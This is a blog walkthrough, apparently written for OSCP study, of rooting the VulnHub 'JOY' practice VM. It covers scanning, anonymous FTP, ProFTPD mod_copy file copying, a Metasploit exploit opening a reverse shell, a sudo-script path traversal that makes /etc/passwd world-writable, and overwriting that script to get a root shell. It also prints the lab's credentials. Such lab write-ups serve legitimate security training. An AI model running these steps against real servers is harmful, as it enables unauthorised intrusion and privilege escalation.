https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

 

 

 


 

 

 

1. Enumeration

 

 

1-1) Scanning 

[root@takudaddy ~/joy]# nmap -A -sV -O -p- 192.168.10.12
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 14:39 KST
Nmap scan report for 192.168.10.12
Host is up (0.00050s latency).
Not shown: 65524 closed ports
PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh        Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp       Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
110/tcp open  pop3?
139/tcp open  tcpwrapped
143/tcp open  imap       Dovecot imapd
445/tcp open  tcpwrapped
465/tcp open  smtp       Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp       Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
995/tcp open  ssl/pop3s?
MAC Address: 08:00:27:DD:DF:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The,  JOY.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.10.12

 

: ftp anonymous login 가능

 

 

 

1-2) Ftp enumeration

 

^C[root@takudaddy /script]# ftp 192.168.10.12
Connected to 192.168.10.12.
220 The Good Tech Inc. FTP Server
Name (192.168.10.12:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 ftp      ftp          2110 Mar 20 05:48 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
226 Transfer complete
ftp> lcd /root/joy
Local directory now /root/joy
ftp> get directory
local: directory remote: directory
200 PORT command successful
150 Opening BINARY mode data connection for directory (2312 bytes)
226 Transfer complete
2312 bytes received in 0.00 secs (20.4157 MB/s)
ftp> get reminder
local: reminder remote: reminder
200 PORT command successful
150 Opening BINARY mode data connection for reminder (24 bytes)
226 Transfer complete
24 bytes received in 0.00 secs (25.6990 kB/s)
ftp> exit
221 Goodbye.

 

 

1-3) check files

[root@takudaddy ~/joy]# cat directory
Patrick's Directory

total 116
drwxr-xr-x 18 patrick patrick 4096 Mar 20 13:50 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick    0 Mar 20 13:40 2A9KDYHqXClvUOqbXw5kUCrkrPeBWaqO.txt
-rw-r--r--  1 patrick patrick    0 Mar 20  2021 9qi3ivRqwDQbdBEFSN5D1UOgblgvNZYl.txt
-rw-------  1 patrick patrick  364 Mar 20 13:49 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  9 patrick patrick 4096 Mar 20 13:37 .cache
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick    0 Mar 20 13:45 EBmOLqTgMs1OewLN8AxrywpA0sRh8dRZ.txt
-rw-r--r--  1 patrick patrick   24 Mar 20 13:45 fqaaAT1OvZYUnvd6tYUtDxxjVTvKhR5dqGACavC736ewvG4kcoDVsBdydIteINVW.txt
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-------  1 patrick patrick 9144 Mar 20 13:50 .ICEauthority
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Mar 20 13:40 S8FjgSR8P51zccvgogWaz4f9hEuflenxpseMHBrn2UkI1xvDKDAXoGkRK6xxTZdL.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos
-rw-r--r--  1 patrick patrick   24 Mar 20  2021 WBUC3WSOiIgzUkcPqjV02Ho1Jjf1wx2V7LSJlGciCYNGWIwyHU3fOqdWmu1iUJhr.txt

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

 

 

1-4) copy and upload files

[root@takudaddy ~/joy]# telnet 192.168.10.12 21
Trying 192.168.10.12...
Connected to 192.168.10.12.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server

site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control    
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.


[root@takudaddy ~/joy]# ftp 192.168.10.12
Connected to 192.168.10.12.
220 The Good Tech Inc. FTP Server
Name (192.168.10.12:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Mar 20 05:59 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 ftp      ftp          2514 Mar 20 06:00 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
-rw-r--r--   1 0        0             407 Mar 20 05:59 version_control
226 Transfer complete
ftp> lcd /root/joy
Local directory now /root/joy
ftp> get version_control
local: version_control remote: version_control
200 PORT command successful
150 Opening BINARY mode data connection for version_control (407 bytes)
226 Transfer complete
407 bytes received in 0.00 secs (2.9405 MB/s)
ftp> byt
?Invalid command
ftp> byr
?Invalid command
ftp> bye
221 Goodbye.
[root@takudaddy ~/joy]# 
[root@takudaddy ~/joy]# ls
directory  reminder  version_control

[root@takudaddy ~/joy]# cat version_control
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
[root@takudaddy ~/joy]# 

 

 

 


 

 

 

2. Exploit

 

2-1) proftpd

[root@takudaddy ~/joy]# msfconsole -q
msf6 > search proftpd 1.3.4
[-] No results from search
msf6 > search proftpd 1.3

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   4  exploit/unix/ftp/proftpd_modcopy_exec   2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/ftp/proftpd_modcopy_exec

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show payloads

Compatible Payloads
===================

   #  Name                         Disclosure Date  Rank    Check  Description
   6  cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   7  cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   8  cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.10.12
RHOSTS => 192.168.10.12
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
SITEPATH => /var/www/tryingharderisjoy
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.10.4
LHOST => 192.168.10.4
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.10.4:4444 
[*] 192.168.10.12:80 - 192.168.10.12:21 - Connected to FTP server
[*] 192.168.10.12:80 - 192.168.10.12:21 - Sending copy commands to FTP server
[*] 192.168.10.12:80 - Executing PHP payload /mtQ3i.php
[*] Command shell session 1 opened (192.168.10.4:4444 -> 192.168.10.12:43386) at 2021-03-20 15:09:33 +0900

id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)

 

 

2-2) Digging

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$ 

www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
MxXVZ.php  YkX2FF.php  mtQ3i.php  ossec  x8jCPN.php
www-data@JOY:/var/www/tryingharderisjoy$ ls -al
ls -al
total 28
drwxr-xr-x 3 www-data www-data 4096 Mar 20 14:10 .
drwxr-xr-x 4 root     root     4096 Mar 20 13:39 ..
-rw-r--r-- 1 root     root       79 Mar 20 14:10 MxXVZ.php
-rw-r--r-- 1 root     root       80 Mar 20 14:09 YkX2FF.php
-rw-r--r-- 1 root     root       78 Mar 20 14:09 mtQ3i.php
drwxr-xr-x 8 www-data www-data 4096 Jan  6  2019 ossec
-rw-r--r-- 1 root     root       78 Mar 20 14:10 x8jCPN.php
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al
ls -al
total 116
drwxr-xr-x 8 www-data www-data  4096 Jan  6  2019 .
drwxr-xr-x 3 www-data www-data  4096 Mar 20 14:10 ..
-rw-r--r-- 1 www-data www-data    92 Jul 19  2016 .hgtags
-rw-r--r-- 1 www-data www-data   262 Dec 28  2018 .htaccess
-rw-r--r-- 1 www-data www-data    44 Dec 28  2018 .htpasswd
-rwxr-xr-x 1 www-data www-data   317 Jul 19  2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35745 Jul 19  2016 LICENSE
-rw-r--r-- 1 www-data www-data  2106 Jul 19  2016 README
-rw-r--r-- 1 www-data www-data   923 Jul 19  2016 README.search
drwxr-xr-x 3 www-data www-data  4096 Jul 19  2016 css
-rw-r--r-- 1 www-data www-data   218 Jul 19  2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data  4096 Jul 19  2016 img
-rwxr-xr-x 1 www-data www-data  5177 Jul 19  2016 index.php
drwxr-xr-x 2 www-data www-data  4096 Jul 19  2016 js
drwxr-xr-x 3 www-data www-data  4096 Dec 28  2018 lib
-rw-r--r-- 1 www-data www-data   462 Jul 19  2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data   134 Jan  6  2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data  2471 Jul 19  2016 setup.sh
drwxr-xr-x 2 www-data www-data  4096 Dec 28  2018 site
drwxrwxrwx 2 www-data www-data  4096 Dec 28  2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cd ^Hpatick.ku
cdpatick.ku
bash: cdpatick.ku: command not found
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecreteso
cat patricksecreteso
cat: patricksecreteso: No such file or directory
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?

 

 

 


 

 

 

3. Privilege Escalation

 

3-1) Login as Patrick

www-data@JOY:/var/www/tryingharderisjoy$ su patrick
su patrick
Password: apollo098765

patrick@JOY:/var/www/tryingharderisjoy$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
    (ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
/etc/passwd
/etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
chmod: cannot access '/home/patrick/script//etc/passwd': No such file or directory
Tidying up...
Done!
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../etc/passwd
../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:~$ ls -al /etc/passwd
ls -al /etc/passwd
-rwxrwxrwx 1 root root 2556 Mar 20 14:45 /etc/passwd


 

 

 

3-2) Create shell code and upload via ftp

로컬에서 동일한 이름의 쉘 파일을 하나 생성

# echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test

 

이 test 파일을 ftp로 업로드하고

telnet으로 해당 파일을

/home/patrick/script/test 로 변경해주면 끝

 

telnet 명령어 >

site cpfr /home/ftp/test

site cpto /home/patrick/script/test

 

[root@takudaddy ~/joy]# cat test
awk 'BEGIN {system("/bin/bash")}'
[root@takudaddy ~/joy]# 
[root@takudaddy ~/joy]# ftp 192.168.10.13 21
Connected to 192.168.10.13.
220 The Good Tech Inc. FTP Server
Name (192.168.10.13:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> lcd /root/joy
Local directory now /root/joy
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
34 bytes sent in 0.00 secs (2.3161 MB/s)
ftp> ls                                                                                                                           
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
-rw-r--r--   1 ftp      ftp            34 Mar 20 07:03 test
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete


[root@takudaddy ~/joy]# telnet 192.168.10.13 21
Trying 192.168.10.13...
Connected to 192.168.10.13.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/test 
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful

 

 

 

3-3) 다 됐다.

이제 침투 서버에서 프로그램을 실행해주자

patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test

root@JOY:/var/www/tryingharderisjoy# cd /root
cd /root
root@JOY:~# ls
ls
author-secret.txt      dovecot.crt  dovecot.key     proof.txt   rootCA.pem
document-generator.sh  dovecot.csr  permissions.sh  rootCA.key  rootCA.srl
root@JOY:~# cat author-secret.txt
cat author-secret.txt
Thanks for joining us!

If you have not rooted MERCY, DEVELOPMENT, BRAVERY, TORMENT, please root them too!

This will conclude the series of five boxes on Vulnhub for pentesting practice, and once again, these were built while thinking about OffSec in mind. :-)

For those who have helped made videos on rooting these boxes, I am more than grateful for your support. This means a lot for the box creator and those who have helped test these boxes. A shoutout to the kind folk from Wizard Labs, Zajt, as well as friends in the local security community which I belong to.

If you found the boxes a good learning experience, feel free to share them with your friends.

As of the time of writing, I will be working on (building) some boxes on Wizard-Labs, in a similar flavour to these boxes. If you enjoyed these, consider pinging them and their project. I think their lab is slowly being built into a nice lab with a variety of machines with good learning value.

I was rather glad someone found me on Linkedin after breaking into these boxes. If you would like to contact the author, you can find some of the author's contact points on his website (https://donavan.sg).

May the r00t be with you.

P.S. Someone asked me, also, about "shesmileslikeabrightsmiley". Yes, indeed, she smiles like a bright smiley. She makes me smile like a bright smiley too? :-)

 

 

 

 

 

728x90

'OSCP > Vulnahub' 카테고리의 다른 글

5. Digitalwolrd.local : bravery  (0) 2021.03.25
4. Digitalworld.local : Develope  (0) 2021.03.23
2. DIGITALWORLD.LOCAL: Mercy V2  (0) 2021.03.19
1. DC: 9  (0) 2021.03.17
현 OSCP 코스 시스템과 비슷한 박스 시작  (0) 2021.03.16

+ Recent posts